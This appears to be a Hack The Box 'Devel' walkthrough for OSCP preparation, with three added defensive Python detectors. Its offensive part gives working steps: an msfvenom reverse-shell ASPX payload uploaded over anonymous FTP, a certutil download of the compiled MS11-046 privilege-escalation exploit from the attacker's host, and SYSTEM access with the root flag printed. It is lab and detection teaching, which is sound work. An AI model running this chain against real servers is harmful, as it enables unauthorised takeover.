In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Mon Oct 16 05:57:12 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/Devel/results/10.10.10.5/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/Devel/results/10.10.10.5/scans/xml/_quick_tcp_nmap.xml 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-16 05:57:19 EDT for 36s
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http syn-ack Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 16 05:57:55 2023 -- 1 IP address (1 host up) scanned in 43.02 seconds
No subdirectories were enumerated with FFUF.
Logging in with FTP
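What a defender should take from this scan is the combination of anonymous FTP and an FTP listing that looks exactly like the default IIS web root. The following is an added example (my own code, not part of the original writeup or any HTB material) that parses nmap -oN output and reports those two conditions together with the risky HTTP methods nmap flagged. It assumes the scan was run with --reason, as above, so every port line carries a REASON column; the embedded scan text is a constructed excerpt of the output shown above.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the relevant part of the writeup's nmap -oN output
# (run with --reason, so each port line carries a REASON column).
SAMPLE_NMAP = """\
Nmap scan report for 10.10.10.5
Host is up, received user-set (0.34s latency).
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# Files that ship in the default IIS web root; seeing them in an FTP listing
# suggests the FTP site and the web site share a directory.
IIS_WEBROOT_MARKERS = {"iisstart.htm", "aspnet_client", "welcome.png"}

# port/proto  state  service  reason  version...   (assumes --reason was used)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)\s*(.*)$")
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# Windows-style directory listing line as printed by the ftp-anon script
LISTING_RE = re.compile(r"^\d{2}-\d{2}-\d{2}\s+\d{2}:\d{2}[AP]M\s+(?:<DIR>|\d+)\s+(\S+)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    script_lines: list = field(default_factory=list)  # NSE output, "|" prefix removed


def parse_nmap(text):
    """Return (host, [Port, ...]) from nmap normal (-oN) output."""
    host, ports, current = None, [], None
    for raw in text.splitlines():
        m = HOST_RE.match(raw)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(raw)
        if m:
            current = Port(int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(6).strip())
            ports.append(current)
            continue
        if raw.startswith("|") and current is not None:
            # NSE lines look like "| key: value" or "|_ last line of a script"
            current.script_lines.append(raw.lstrip("|_").strip())
    return host, ports


def assess(host, ports):
    """Turn parsed ports into findings a defender would want to fix."""
    findings = []
    open_services = {p.service for p in ports if p.state == "open"}
    for p in ports:
        if p.state != "open":
            continue
        joined = "\n".join(p.script_lines)
        if p.service == "ftp" and "Anonymous FTP login allowed" in joined:
            findings.append(f"{host}:{p.number} anonymous FTP login is permitted")
            listed = set()
            for line in p.script_lines:
                m = LISTING_RE.match(line)
                if m:
                    listed.add(m.group(1))
            overlap = listed & IIS_WEBROOT_MARKERS
            if overlap and "http" in open_services:
                findings.append(
                    f"{host}:{p.number} FTP root lists IIS web-root files {sorted(overlap)}; "
                    "a writable anonymous share here lets uploaded .aspx files run as web content"
                )
        if p.service == "http":
            m = re.search(r"Potentially risky methods: (.+)", joined)
            if m:
                findings.append(f"{host}:{p.number} risky HTTP methods enabled: {m.group(1).strip()}")
    return findings


if __name__ == "__main__":
    for finding in assess(*parse_nmap(SAMPLE_NMAP)):
        print(finding)
```

Run it against any -oN file and the three findings for this box come out in order: anonymous login, web-root overlap, and TRACE enabled. The overlap check is the one that matters most here, since anonymous read access alone is a much smaller problem than anonymous write access into the directory IIS executes from.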
╰─$ ftp 10.10.10.5 130 ↵
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49187|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
10-16-23 02:23PM 3427 shell.aspx
10-16-23 02:24PM 2754 shell2.aspx
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp>
We can upload files here.
Creating an ASPX shell. I first tried x64, which failed, so I tried x86.
╭─kali@kali ~/HTB/Devel
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.31 LPORT=80 EXITFUNC=thread -f aspx -o shell2.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2754 bytes
Saved as: shell2.aspx
╭─kali@kali ~/HTB/Devel
Uploaded this to the machine over FTP:
ftp> binary
ftp> put shell2.aspx shell2.aspx
local: shell2.aspx remote: shell2.aspx
229 Entering Extended Passive Mode (|||49185|)
150 Opening BINARY mode data connection.
100% |****************************************************************************| 2754 15.09 MiB/s 00:00 ETA
226 Transfer complete.
2754 bytes sent in 00:00 (7.93 KiB/s)
ftp>
Requested the file in the browser -> http://10.10.10.5/shell2.aspx while listening on port 80:
listening on [any] 80 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.5] 49186
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
c:\windows\system32\inetsrv>
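The upload followed by a browser request is exactly the pair of events IIS records on both sides: a STOR in the FTP site's W3C log and a GET for the same name in the web site's log a moment later. Below is an added example, not code from the writeup, that correlates the two. The log lines are constructed to mirror this session with abridged field lists, the field names follow IIS W3C logging, and the 24-hour correlation window is an assumed default.

```python
import datetime as dt
from pathlib import PurePosixPath

# Constructed IIS 7.5 W3C logs modelled on the events in this writeup. Field lists
# are abridged; real logs carry more columns, which is why the parser reads the
# #Fields directive instead of assuming positions. Times are UTC as IIS logs them.
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2023-10-16 11:23:40 10.10.14.31 - 10.10.10.5 21 USER anonymous 331 0
2023-10-16 11:23:41 10.10.14.31 anonymous 10.10.10.5 21 PASS *** 230 0
2023-10-16 11:24:02 10.10.14.31 anonymous 10.10.10.5 21 STOR shell2.aspx 226 0
2023-10-16 11:25:10 10.10.14.31 anonymous 10.10.10.5 21 STOR welcome.png 226 0
"""

HTTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2023-10-16 11:24:05 10.10.10.5 GET /iisstart.htm - 80 10.10.14.31 Mozilla/5.0 200
2023-10-16 11:24:30 10.10.10.5 GET /shell2.aspx - 80 10.10.14.31 Mozilla/5.0 200
"""

# Extensions IIS hands to a script engine instead of serving as static content.
SERVER_EXECUTABLE = {".aspx", ".asp", ".ashx", ".asmx"}
SUCCESSFUL_STOR = "226"  # FTP "transfer complete"


def parse_w3c(text):
    """Parse a W3C extended log into dicts keyed by the names in #Fields."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()  # W3C encodes spaces inside a field as '+'
        if fields is None or len(values) != len(fields):
            continue  # header missing or truncated line: skip rather than mis-map columns
        row = dict(zip(fields, values))
        row["ts"] = dt.datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows


def normalise(path):
    """FTP clients may STOR 'x.aspx' or '/x.aspx'; compare both against the HTTP uri-stem."""
    return "/" + path.lstrip("/").lower()


def correlate(ftp_rows, http_rows, window=dt.timedelta(hours=24)):
    """Flag executable uploads, then any HTTP request for the same path afterwards."""
    alerts, uploads = [], []
    for r in ftp_rows:
        if r.get("cs-method") != "STOR" or r.get("sc-status") != SUCCESSFUL_STOR:
            continue
        path = normalise(r["cs-uri-stem"])
        if PurePosixPath(path).suffix in SERVER_EXECUTABLE:
            uploads.append((path, r))
            alerts.append({"rule": "ftp-executable-upload", "path": path,
                           "client": r["c-ip"], "user": r.get("cs-username"), "time": r["ts"]})
    for path, up in uploads:
        for h in http_rows:
            if normalise(h.get("cs-uri-stem", "")) == path and up["ts"] <= h["ts"] <= up["ts"] + window:
                alerts.append({"rule": "uploaded-file-executed", "path": path,
                               "uploader": up["c-ip"], "requester": h["c-ip"],
                               "status": h.get("sc-status"), "time": h["ts"]})
                break  # one alert per upload is enough; later hits are the same story
    return alerts


if __name__ == "__main__":
    for alert in correlate(parse_w3c(FTP_LOG), parse_w3c(HTTP_LOG)):
        print(alert)
```

The upload of welcome.png produces nothing, because the point is not "someone used FTP" but "someone placed server-executable content and then caused IIS to run it". On a real site the first rule alone is worth alerting on whenever the uploading user is anonymous.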
Priv esc
Checking systeminfo:
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 16/10/2023, 12:54:55 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.372 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.430 MB
Virtual Memory: In Use: 711 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Local Area Connection 3
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
[02]: fe80::58c0:f1cf:abc6:bb9e
[03]: dead:beef::b1cc:9bbb:77dc:5d97
[04]: dead:beef::58c0:f1cf:abc6:bb9e
Checking online for a Windows 7 x86 6.1.7600 privesc,
we find https://www.exploit-db.com/exploits/40564
We also find it via searchsploit and copy it to our folder:
╰─$ searchsploit -m windows_x86/local/40564.c
Exploit: Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
URL: https://www.exploit-db.com/exploits/40564
Path: /usr/share/exploitdb/exploits/windows_x86/local/40564.c
Codes: CVE-2011-1249, MS11-046
Verified: True
File Type: C source, ASCII text
cp: overwrite '/home/kali/HTB/Devel/40564.c'?
As per the instructions in the exploit source, we compile it with MinGW -> i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
╭─kali@kali ~/HTB/Devel
╰─$ i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
╭─kali@kali ~/HTB/Devel
╰─$ ls
30281.txt 40564.exe ms09-053-iis-ftpd_nlst.py results shell.aspx stackadj winPEASx86.exe
40564.c encoded_shellcode.raw payload shell2.aspx shellcode winPEASx64.exe
╭─kali@kali ~/HTB/Devel
╰─$
We transfer this to the Windows host using certutil while serving the file over HTTP from our machine:
c:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.31:9000/40564.exe c:\Users\Public\Downloads\40564.exe
certutil -urlcache -f http://10.10.14.31:9000/40564.exe c:\Users\Public\Downloads\40564.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\Users\Public\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 137F-3971
Directory of c:\Users\Public\Downloads
16/10/2023 03:22 �� <DIR> .
16/10/2023 03:22 �� <DIR> ..
16/10/2023 03:22 �� 239.983 40564.exe
16/10/2023 03:09 �� 2.388.480 winPEASx86.exe
2 File(s) 2.628.463 bytes
2 Dir(s) 4.502.626.304 bytes free
c:\Users\Public\Downloads>40564.exe
40564.exe
c:\Windows\System32>whoami
whoami
nt authority\system
c:\Windows\System32>
We are now NT AUTHORITY\SYSTEM.
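From the host side, the chain in this section is w3wp.exe spawning cmd.exe, which runs certutil with -urlcache to fetch a binary into C:\Users\Public\Downloads and then executes it as the application pool identity. Here is an added example, not from the writeup, that rebuilds that process tree from Sysmon-style process-creation records and flags each step. The events are constructed from the commands above with a subset of Sysmon Event ID 1 fields, and the code assumes ProcessId/ParentProcessId are enough to link parents within one log window (real pipelines key on ProcessGuid).

```python
from pathlib import PureWindowsPath

# Constructed process-creation events with a subset of Sysmon Event ID 1 fields.
# Assumption: ProcessId/ParentProcessId suffice to rebuild the tree within one
# log window; production detections should key on ProcessGuid instead.
# The chain mirrors this box: w3wp.exe -> cmd.exe -> certutil.exe / 40564.exe.
EVENTS = [
    {"ProcessId": 600, "ParentProcessId": 4, "User": "NT AUTHORITY\\SYSTEM",
     "Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k iissvcs"},
    {"ProcessId": 1200, "ParentProcessId": 600, "User": "IIS APPPOOL\\web",
     "Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "CommandLine": "w3wp.exe -ap \"web\""},
    {"ProcessId": 1340, "ParentProcessId": 1200, "User": "IIS APPPOOL\\web",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"},
    {"ProcessId": 1388, "ParentProcessId": 1340, "User": "IIS APPPOOL\\web",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://10.10.14.31:9000/40564.exe c:\\Users\\Public\\Downloads\\40564.exe"},
    {"ProcessId": 1402, "ParentProcessId": 1340, "User": "IIS APPPOOL\\web",
     "Image": "C:\\Users\\Public\\Downloads\\40564.exe", "CommandLine": "40564.exe"},
    # Benign certutil use by an interactive user, included so the rule has a negative case.
    {"ProcessId": 2210, "ParentProcessId": 900, "User": "DEVEL\\babis",
     "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -verify cert.cer"},
]

WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Locations any local account can write to; a web worker has no business launching binaries from them.
USER_WRITABLE_ROOTS = ("c:\\users\\public\\", "c:\\windows\\temp\\", "c:\\programdata\\")


def basename(image):
    """Case-insensitive file name of an image path."""
    return PureWindowsPath(image).name.lower()


def build_tree(events):
    return {e["ProcessId"]: e for e in events}


def ancestors(event, by_pid):
    """Yield parent, grandparent, ... as far as the log lets us walk (cycle-safe)."""
    seen = set()
    cur = by_pid.get(event["ParentProcessId"])
    while cur is not None and cur["ProcessId"] not in seen:
        seen.add(cur["ProcessId"])
        yield cur
        cur = by_pid.get(cur["ParentProcessId"])


def detect(events):
    by_pid = build_tree(events)
    alerts = []
    for e in events:
        name = basename(e["Image"])
        cmd = e["CommandLine"].lower()
        from_web = any(basename(a["Image"]) in WEB_WORKERS for a in ancestors(e, by_pid))
        if name in SHELLS and from_web:
            alerts.append({"rule": "web-worker-spawned-shell", "pid": e["ProcessId"], "user": e["User"]})
        if name == "certutil.exe" and "urlcache" in cmd and "://" in cmd:
            alerts.append({"rule": "certutil-urlcache-download", "pid": e["ProcessId"],
                           "from_web_worker": from_web, "cmd": e["CommandLine"]})
        if (e["User"].upper().startswith("IIS APPPOOL\\")
                and e["Image"].lower().startswith(USER_WRITABLE_ROOTS)):
            alerts.append({"rule": "apppool-ran-binary-from-writable-dir",
                           "pid": e["ProcessId"], "image": e["Image"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Each of the three rules fires on its own, but the ancestry walk is what lets you rank them: a certutil download is noise on an admin workstation and a high-confidence incident when its grandparent is w3wp.exe. The same walk would also have flagged winPEASx86.exe, which sits in the same directory listing above.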
c:\Users>cd administrator
cd administrator
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>type root.txt
type root.txt
e621a0b5041708797c4fc4728bc72b4b
c:\Users\Administrator\Desktop>